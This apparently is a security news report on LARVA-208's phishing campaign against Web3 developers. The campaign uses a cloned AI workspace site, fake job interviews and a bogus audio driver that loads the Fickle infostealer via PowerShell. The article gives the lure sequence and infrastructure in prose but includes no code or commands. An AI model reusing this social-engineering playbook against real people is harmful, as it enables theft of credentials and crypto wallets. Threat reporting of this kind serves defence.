A sophisticated new phishing campaign orchestrated by the threat group LARVA-208 has been uncovered, targeting Web3 developers by imitating legitimate AI workspace platforms in a bid to harvest user credentials and sensitive project data.
Well-known for its social engineering tactics and phishing operations against IT professionals, LARVA-208 has recently pivoted its focus to exploit the trust placed in emerging AI technologies and decentralized development environments.
Social Engineering Campaign
Recent investigations reveal that LARVA-208 is leveraging domains such as “norlax.ai” a convincing clone of the reputable AI workspace “teampilot.ai” to lure victims into elaborate social engineering traps.

The attackers initiate contact by sending direct messages or emails to Web3 developers, often framing their outreach as job opportunities, portfolio reviews, or interviews for enticing positions in the blockchain and cryptocurrency sectors.
Once rapport is established, targets receive bespoke meeting links that ostensibly lead to AI-powered collaboration spaces.
According to Catalyst Report, the attackers meticulously generate unique email invitations and access codes, heightening the appearance of legitimacy and minimizing the risk of mass-detection.
Upon accessing the fraudulent Norlax AI platform, victims are prompted to join what appears to be a genuine call.
The deception deepens as the attackers enable their microphones, simulating an authentic interview environment.
However, the victim’s microphone invariably encounters a purported “audio driver error,” prompting a download link for a legitimate-sounding Realtek HD Audio Driver.
Behind this façade lies malicious code: when the executable is launched, a PowerShell payload is covertly deployed, reaching out to actor-controlled command and control (C2) infrastructure to download the Fickle infostealer.
The Fickle malware, delivered under the guise of trusted software, is engineered to exfiltrate a broad spectrum of system data including machine and user identifiers, hardware configurations, installed programs, running processes, and comprehensive geolocation information.
Collected credentials, crypto wallets, and other development secrets are promptly transferred to LARVA-208’s C2 servers, known as SilentPrism, enabling real-time victim monitoring and pursuit of lucrative assets.

Threat Actors Shift Tactics
Two primary attack vectors have been observed. The initial approach targets active members of blockchain and Web3 communities, mainly through platforms like X (formerly Twitter) and Telegram, by offering supposed interviews or project collaborations.
The secondary method exploits recruitment platforms like Remote3, circumventing platform-native security by first engaging candidates via legitimate Google Meet sessions before transitioning the conversation to the malicious Norlax AI environment, in defiance of established platform guidelines.
While LARVA-208 previously employed .LNK shortcut files disguised as plausible administrative scripts that surreptitiously executed PowerShell commands recent campaigns show a shift towards malicious executable downloads and use of reputable file-hosting services such as Filebin for payload distribution.
As a means of operational security and continuity, the group leverages bulletproof hosting providers like FFv2 for both phishing and C2 domains.
Notably, these infrastructure elements overlap with resources attributed to the notorious Luminous Mantis group, further muddying attribution and complicating takedown efforts.
This technically adept social engineering campaign demonstrates a clear evolution in attacker methodology, emphasizing the exploitation of trending technology interfaces to bypass established security controls.
By weaponizing both social trust and technical obfuscation, LARVA-208 has effectively expanded its reach to high-value targets in the Web3 ecosystem, underscoring the persistent and adaptable nature of contemporary cybercrime.
As infostealers like Fickle are deployed under new guises and monetization strategies evolve away from classic ransomware models, the campaign signals an urgent need for Web3 professionals to scrutinize unsolicited job offers, carefully validate platform authenticity, and adopt robust endpoint security practices.
The incident serves as a stark reminder that the intersection of innovation and opportunism in cybercriminal tactics continues to threaten the confidentiality and integrity of digital assets and developer operations worldwide.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.